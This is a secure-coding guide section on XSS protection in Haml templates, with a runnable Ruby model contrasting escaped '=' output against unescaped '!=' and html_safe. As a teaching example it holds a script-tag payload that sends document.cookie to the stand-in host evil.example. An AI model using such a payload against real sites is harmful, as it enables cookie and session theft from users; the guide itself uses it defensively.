XSS protection in Haml templates

If you're using Haml templates instead of ERB, strings are automatically escaped in the same way as in ERB templates. Also like in ERB templates, HTML-safe strings (strings for which string.html_safe? returns true) won't be escaped automatically. The != notation in Haml works like <%= raw(…) %> in ERB, so it renders the unescaped version.

By default,

= "<em>emphasized</em>"
!= "<em>emphasized</em>"

compiles to:

&lt;em&gt;emphasized&lt;/em&gt;
<em>emphasized</em>

So take care when using != in Haml: make sure no user data is rendered unescaped. Calling html_safe on a string that contains user input has the same effect, because = then skips escaping for that string as well.
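The following plain-Ruby model is an added illustration, not code from this guide, from Haml or from Rails: it reproduces the three rules above (escape by default, pass html_safe? strings through, never escape after !=) so the difference can be run and inspected without a Rails app. SafeString stands in for ActiveSupport's safe-buffer type, haml_eq and haml_bang_eq stand in for Haml's = and !=, and the render helpers and USER_COMMENT input are constructed for the example.

```ruby
require "cgi"

# Stand-in for ActiveSupport's safe-buffer type (assumed name, not Rails' own).
# A value of this class promises it is already HTML, so `=` passes it through.
class SafeString < String
  def html_safe?
    true
  end
end

class String
  # Plain strings are never trusted. ActiveSupport defines the real versions
  # of these two methods; they are reimplemented here so the file runs alone.
  def html_safe?
    false
  end

  def html_safe
    SafeString.new(self)
  end
end

# Model of `= expr` in Haml (and <%= expr %> in ERB): escape unless the value
# claims to be html_safe?. Non-string values (integers, nil) are escaped too.
def haml_eq(value)
  return value.to_s if value.respond_to?(:html_safe?) && value.html_safe?
  CGI.escapeHTML(value.to_s)
end

# Model of `!= expr` in Haml (and <%= raw(expr) %> in ERB): emit verbatim.
def haml_bang_eq(value)
  value.to_s
end

# Constructed attacker input, as a comment body submitted through a form.
USER_COMMENT = %q(<script>document.location="https://evil.example/?c="+document.cookie</script>)

# Vulnerable template line: `!=` on user data renders the script tag live.
def render_comment_raw(text)
  "<p class=\"comment\">#{haml_bang_eq(text)}</p>"
end

# Safe template line: `=` turns the same input into inert text.
def render_comment_escaped(text)
  "<p class=\"comment\">#{haml_eq(text)}</p>"
end

if __FILE__ == $0
  puts haml_eq("<em>emphasized</em>")           # &lt;em&gt;emphasized&lt;/em&gt;
  puts haml_eq("<em>emphasized</em>".html_safe) # <em>emphasized</em>
  puts haml_bang_eq("<em>emphasized</em>")      # <em>emphasized</em>
  puts render_comment_raw(USER_COMMENT)         # script tag reaches the browser
  puts render_comment_escaped(USER_COMMENT)     # &lt;script&gt;... shown as text
end
```

The point to take from the last two lines is that the template author, not the data, decides whether escaping happens: the same USER_COMMENT is harmless under = and a working injection under !=, and marking it with html_safe would make = behave like != for it.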